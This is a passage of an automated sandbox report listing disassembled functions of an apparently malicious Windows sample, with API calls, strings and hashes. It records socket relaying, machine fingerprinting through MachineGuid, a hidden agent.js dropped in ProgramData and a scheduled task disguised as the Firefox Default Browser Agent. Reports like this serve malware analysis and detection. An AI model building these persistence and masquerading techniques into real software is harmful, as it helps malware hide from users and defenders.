Opcode Fuzzy Hash: 1c3c06781e62bd852d3f9c52370b66bdf8fdab5e5eb2a7a8cea97b66b018aa5c
Instruction Fuzzy Hash: 76519076A00219EFEB208FA5EC44BAF7BB9FB49704F244475E914F7291DB70D8098B60

Function 00E462F0 Relevance: 24.1, APIs: 16, Instructions: 136networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 00E46310
htons.WS2_32(?), ref: 00E4632C
inet_pton.WS2_32(00000002,?,?), ref: 00E4633E
htons.WS2_32(?), ref: 00E46345
socket.WS2_32(00000002,00000001,00000006), ref: 00E46358
connect.WS2_32(00000000,?,00000010), ref: 00E46373
socket.WS2_32(00000002,00000001,00000006), ref: 00E46384
connect.WS2_32(00000000,?,00000010), ref: 00E46399
select.WS2_32(00000000,?), ref: 00E463C1
recv.WS2_32(?,?,00000400,00000000), ref: 00E463F4
send.WS2_32(00000000,?,00000000,00000000), ref: 00E4641A
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 00E4644C
closesocket.WS2_32(00000000), ref: 00E46462
closesocket.WS2_32(00000000), ref: 00E46469
GetProcessHeap.KERNEL32(00000000,?), ref: 00E46474
HeapFree.KERNEL32(00000000), ref: 00E4647B

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 1922096520-0
Opcode ID: 1d80a40a7de81724984adc6c16b655cacccfe0fb846de8f294964853ce92821a
Instruction ID: ffd5c17c5fc7903605ce4708c2bf413e14e78fb7f8fdd280cfe1146dc1d1f8c8
Opcode Fuzzy Hash: 1d80a40a7de81724984adc6c16b655cacccfe0fb846de8f294964853ce92821a
Instruction Fuzzy Hash: A1418F71144314AFD710DF659C89B6BB7E8BF89714F10091AF655E72D0D3B0D8498B62

Function 00E472E0 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 00E472F3
htons.WS2_32(?), ref: 00E472FE
socket.WS2_32(00000002,00000001,00000006), ref: 00E47316
connect.WS2_32(00000000,?,00000010), ref: 00E47334
recv.WS2_32(00000000,?,00000002,00000000), ref: 00E4734C
GetProcessHeap.KERNEL32(00000008,00000024), ref: 00E4736D
HeapAlloc.KERNEL32(00000000), ref: 00E47370
CreateThread.KERNEL32(00000000,00000000,Function_000062F0,00000000,00000000,00000000), ref: 00E473EB
CloseHandle.KERNEL32(00000000), ref: 00E473F6
recv.WS2_32(00000000,?,00000002,00000000), ref: 00E4740E
closesocket.WS2_32(00000000), ref: 00E4741D
GetProcessHeap.KERNEL32(00000000,?), ref: 00E47426
HeapFree.KERNEL32(00000000), ref: 00E47429
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E47443
HeapFree.KERNEL32(00000000), ref: 00E47446

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: 0b1b1c02645581aad9780fff07df5e49c91d016358abc68437007eff48ca0450
Instruction ID: 14562ca76cbbc452d1c8b0f88c3ba7392658f6717c301c1469c8b071e3aff491
Opcode Fuzzy Hash: 0b1b1c02645581aad9780fff07df5e49c91d016358abc68437007eff48ca0450
Instruction Fuzzy Hash: 7D410638A08345AFEB209FB6AC49B6B7F68FF06705F041458F951FB282D370D84687A0

Function 00621E90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 00621F50
task.LIBCPMTD ref: 00621F5F
task.LIBCPMTD ref: 00621F8F
task.LIBCPMTD ref: 00621F9B
task.LIBCPMTD ref: 00621FA7
task.LIBCPMTD ref: 00621FB3
task.LIBCPMTD ref: 00621FBF
task.LIBCPMTD ref: 00621FCE

Strings

hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00621EC5, 00621F07, 00621F24
fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00621EF6
gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00621EDD
`, xrefs: 00621F6C

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traits
String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
API String ID: 1455298312-2158094500
Opcode ID: d9bf2b671ef44762c78ffd50aea4791e3c3f6c4d0f0732b7289191afca9a1f73
Instruction ID: f92ddbc760d794346da5d7aee2e89aa3277bbb3f2940be17dbf4b0798d2abf32
Opcode Fuzzy Hash: d9bf2b671ef44762c78ffd50aea4791e3c3f6c4d0f0732b7289191afca9a1f73
Instruction Fuzzy Hash: A8415A709047ACDADB04DBA4EA65BDDFBB2AF21704F50419DE0056B282DB791B08CFA5

Function 00E471B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 00E471D1
lstrlenW.KERNEL32(?), ref: 00E471DA
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 00E471F5
GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00E47203
GetLastError.KERNEL32 ref: 00E4720D
ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 00E47224
wnsprintfW.SHLWAPI ref: 00E4723E
SetFileAttributesW.KERNEL32(?,00000006), ref: 00E4725E

Strings

%ProgramFiles%, xrefs: 00E471F0
%ProgramW6432%, xrefs: 00E471CC
%ProgramData%\agent.js, xrefs: 00E4721F
"%s", xrefs: 00E4722D

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
API String ID: 457462216-4115850629
Opcode ID: 19ed835e8ebb7646108268fd7e3d4e03477e9500d482309a72a8493c0cb921c0
Instruction ID: f287bbd6f956e80631cd58ee8494a7e9f4e232bf25d0a6d18638ba9931ece01b
Opcode Fuzzy Hash: 19ed835e8ebb7646108268fd7e3d4e03477e9500d482309a72a8493c0cb921c0
Instruction Fuzzy Hash: 311152B5A4031CABDB20DBA1AC49EDA776CEB05704F4000A1A655F2090EBB4AAC98FD1

Function 0062A0C4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0062A108

Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C4C
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C5E
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C70
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C82
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C94
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CA6
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CB8
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CCA
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CDC
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CEE
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D00
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D12
Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D24

_free.LIBCMT ref: 0062A0FD

Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA

_free.LIBCMT ref: 0062A11F
_free.LIBCMT ref: 0062A134
_free.LIBCMT ref: 0062A13F
_free.LIBCMT ref: 0062A161
_free.LIBCMT ref: 0062A174
_free.LIBCMT ref: 0062A182
_free.LIBCMT ref: 0062A18D
_free.LIBCMT ref: 0062A1C5
_free.LIBCMT ref: 0062A1CC
_free.LIBCMT ref: 0062A1E9
_free.LIBCMT ref: 0062A201

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 54777cde629483e480ba59ac4836439a1a6dde3ea701d54822a49471e4d3c2fe
Instruction ID: 79395b35669cab6caf660687e11dcfd9560bc7d95f5202092de2d10deec0de4d
Opcode Fuzzy Hash: 54777cde629483e480ba59ac4836439a1a6dde3ea701d54822a49471e4d3c2fe
Instruction Fuzzy Hash: C7315E31608A219FDB619A78E949B9AB7EAAF04320F10941DE454D7251DFB0BC90CF25

Function 00622540 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

operator!=.LIBCPMTD ref: 00622606
task.LIBCPMTD ref: 00622614
task.LIBCPMTD ref: 00622623

Strings

8, xrefs: 00622655
(, xrefs: 006225B5
, xrefs: 0062267A
0, xrefs: 00622630
nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng, xrefs: 00622582, 006225D1, 006225EE
W, xrefs: 0062269A

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
API String ID: 2802545854-1628632686
Opcode ID: 8fe906f5b91ee345e94eccf161f615f3812688b5d99c311120524ce73cdd6b8f
Instruction ID: 387e4edde70ababe19558ed078c2646aa2b74b680b144657b54722b087e07ee8
Opcode Fuzzy Hash: 8fe906f5b91ee345e94eccf161f615f3812688b5d99c311120524ce73cdd6b8f
Instruction Fuzzy Hash: 11514771D04A69EBDB14CFA8E964BEDBBB2BB04304F10822DE401BB385DB795A45CF50

Function 00E469D0 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E4A080), ref: 00E469E1
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00E46A1A
LeaveCriticalSection.KERNEL32(00E4A080,00000000), ref: 00E46A36
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46A90
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46A97
LeaveCriticalSection.KERNEL32(00E4A080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AAD
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AC7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46ACE
LeaveCriticalSection.KERNEL32(00E4A080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46ADF
GetProcessHeap.KERNEL32(00000008,?,?), ref: 00E46AEB
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AF2
LeaveCriticalSection.KERNEL32(00E4A080), ref: 00E46B03

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: 6c6e593aa525a2f5a236bdbf72e78699bbd12b479e5ba851d57d84e0d6814d35
Instruction ID: 52a81edd49d2e0321407319400df50ba40fdb548b6421958479a3c0a4ddc857f
Opcode Fuzzy Hash: 6c6e593aa525a2f5a236bdbf72e78699bbd12b479e5ba851d57d84e0d6814d35
Instruction Fuzzy Hash: 8031E4756412019FE7249FB6FC4CB6A3B69FB87326F086439F016F2250CB70C44A8712

Function 00628212 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00628228

Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA

_free.LIBCMT ref: 00628234
_free.LIBCMT ref: 0062823F
_free.LIBCMT ref: 0062824A
_free.LIBCMT ref: 00628255
_free.LIBCMT ref: 00628260
_free.LIBCMT ref: 0062826B
_free.LIBCMT ref: 00628276
_free.LIBCMT ref: 00628281
_free.LIBCMT ref: 0062828F

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 650793e277db7cca20f9bf3ca7140a996f7eb021a020c34bb60b2057023817ef
Instruction ID: 4cd105a4b7d69cc1bcb267c1db9b564558f784c25a916d50fda268be2a92be8a
Opcode Fuzzy Hash: 650793e277db7cca20f9bf3ca7140a996f7eb021a020c34bb60b2057023817ef
Instruction Fuzzy Hash: 7221A976904518AFCB41EF94D981DDEBBBABF08340F0051AAF6159B221DB31EA94CF94

Function 006253DB Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006254FA
___TypeMatch.LIBVCRUNTIME ref: 00625608
_UnwindNestedFrames.LIBCMT ref: 0062575A
CallUnexpected.LIBVCRUNTIME ref: 00625775

Strings

csm, xrefs: 00625485
G&, xrefs: 0062577A
csm, xrefs: 00625531
csm, xrefs: 00625418

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$G&
API String ID: 2751267872-2003760868
Opcode ID: 0f3740bb4b386ffc281a8da9ae7b113617e7a8c9241752018b4452859f20faf0
Instruction ID: b1aeecd7a80abd85466d38be455f8c27edc84eb600273fe4c313122e6776deeb
Opcode Fuzzy Hash: 0f3740bb4b386ffc281a8da9ae7b113617e7a8c9241752018b4452859f20faf0
Instruction Fuzzy Hash: 78B16A71800E29EFCF34DFA4E8819AEBBB6FF14310B14855AE8126B216D731DA51CF95

Function 00E47050 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
HeapAlloc.KERNEL32(00000000), ref: 00E470B9
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
RegCloseKey.ADVAPI32(80000002), ref: 00E470E8

Strings

MachineGuid, xrefs: 00E4709B, 00E470CE
SOFTWARE\Microsoft\Cryptography, xrefs: 00E4707D

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: 6ae0b3a274ca32db051520b22b1535a7b7affc8d4766cb13542c0db01475670f
Instruction ID: 59da52f6a9cfb77242752fbefbb6cb86a78efc85eb15ed0f604b6421199b2e9b
Opcode Fuzzy Hash: 6ae0b3a274ca32db051520b22b1535a7b7affc8d4766cb13542c0db01475670f
Instruction Fuzzy Hash: A541BE31E0A315ABDB308BA9E884ABFB7B8AF48704F106459E881B7350E7719D85C7D0

Function 00621D30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

operator!=.LIBCPMTD ref: 00621DB9
task.LIBCPMTD ref: 00621DC7
task.LIBCPMTD ref: 00621DD6

Strings

H, xrefs: 00621E28
jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug, xrefs: 00621D5B, 00621D84, 00621DA1
1, xrefs: 00621E08
P, xrefs: 00621D76

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
API String ID: 2802545854-3608006743
Opcode ID: c118306069d3f96578b03f9ce6f0cfb9139bd81ce7aca49746b90c8821937b55
Instruction ID: 764115aa25cb2d94577ce61333d371916b3f37a749b6bffaab61027a845ee304
Opcode Fuzzy Hash: c118306069d3f96578b03f9ce6f0cfb9139bd81ce7aca49746b90c8821937b55
Instruction Fuzzy Hash: 1E413770D08668DBCB14DFA4E995BEDBBB2FF11704F10412DE812AB280DB785A46CF54

Function 00E46B10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E46B27
CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?), ref: 00E46B44
SysAllocString.OLEAUT32(\Mozilla), ref: 00E46B84
SysFreeString.OLEAUT32(?), ref: 00E46BBB
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46BC8
SysFreeString.OLEAUT32(00000000), ref: 00E46BDF

Strings

Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 00E46BC3
\Mozilla, xrefs: 00E46B7F

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 458046B0AF4A39CB$\Mozilla
API String ID: 478541636-252850850
Opcode ID: cda59eab985042d346a36865aa79213316dc377d2cc9dd3a8eea59633892ef64
Instruction ID: 9b641928a16aa97916417119bcec1eb33b9ec158c150483003d3eeea23bc660a
Opcode Fuzzy Hash: cda59eab985042d346a36865aa79213316dc377d2cc9dd3a8eea59633892ef64
Instruction Fuzzy Hash: 20317034F00248AFDB049B69DC89BAEBBB8EF4A345F005199E945F7251D630AD85CBA1

Function 006228A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94COMMON

Download Yara Rule

Strings

uqip, xrefs: 00622902
9, xrefs: 00622913
&, xrefs: 00622973
8, xrefs: 00622993
jgjqrkqomrozhbdhmdxtwulfach, xrefs: 006228D9

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: char_traits
String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
API String ID: 1158913984-1523665428
Opcode ID: 0b92f9c707d754f4773c508162756ad4d98d40a16f1b60e1b81394d5f1bd94f0
Instruction ID: f59eda3c983dafea20d07f972c1f5eb976d2d1f0b8f81befd8feda137bedb4e9
Opcode Fuzzy Hash: 0b92f9c707d754f4773c508162756ad4d98d40a16f1b60e1b81394d5f1bd94f0
Instruction Fuzzy Hash: 27418C70D04A6ADACB14CFE6E5657EDBBB2FB04304F104119D0126B288DF795985CF41

Function 006226F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

operator!=.LIBCPMTD ref: 006227B9
task.LIBCPMTD ref: 006227CA
task.LIBCPMTD ref: 006227D9

Strings

jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 0062276C
wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00622746, 00622781, 0062279E

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
API String ID: 2802545854-3928441437
Opcode ID: aa0cfa3e707d03491be3fc85186bd123688a93676ac1ced218b9d22aef2ed382
Instruction ID: e46612cb7d5f828bd93ab12ae263a8ea4c1899038fc692f20dfe5d753c79abd6
Opcode Fuzzy Hash: aa0cfa3e707d03491be3fc85186bd123688a93676ac1ced218b9d22aef2ed382
Instruction Fuzzy Hash: 39419870D04AA8DADB10DFA4E925BEDBBB2AF15304F10825DD0017B285DBB85B09CFA1

Function 00622450 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 006224E6
task.LIBCPMTD ref: 006224F2
task.LIBCPMTD ref: 006224FE
task.LIBCPMTD ref: 0062250A
task.LIBCPMTD ref: 00622519

Strings

cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 006224A0
fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 006224CF
dzydwibcsmroxflhizzvayjcy, xrefs: 00622482

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traits
